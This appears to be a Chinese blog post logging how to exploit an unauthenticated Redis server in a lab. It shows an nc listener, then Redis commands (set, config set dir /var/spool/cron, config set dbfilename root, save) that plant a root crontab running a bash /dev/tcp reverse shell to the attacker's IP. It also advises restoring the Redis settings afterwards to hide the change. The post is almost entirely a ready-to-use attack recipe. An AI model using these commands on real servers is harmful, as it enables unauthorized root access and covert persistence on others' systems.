Redis未授权访问反弹shell记录

环境配置情况:

攻击机:kali-2021.2 ,配置IP:10.1.25.44

redis靶机:CentOS 7.2 ,配置IP:10.3.70.70

1、在攻击机(10.1.25.44)先建立监听。

nc -nvlp 7788

2、在连接redis的客户端依次执行以下命令。

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n"   //往当前用户的crontab里写入反弹shell,经验告诉换行\n是必须

config set dir /var/spool/cron   //配置文件夹的路径,每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

config set dbfilename root    //这个不一定要

save    //保存

 3、执行save命令后,回去看一下攻击机,反弹shell成功。

一些命令补充知识:

1、查看redis版本信息、服务器版本等信息。

info

2、查看所有键

keys *

 3、删除key,del后加key名称,以下删除key:xxx。

del xxx

4、获取默认的redis目录、和rdb文件名:可在修改前先获取,离开时再恢复

config get dir
config get dbfilename

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值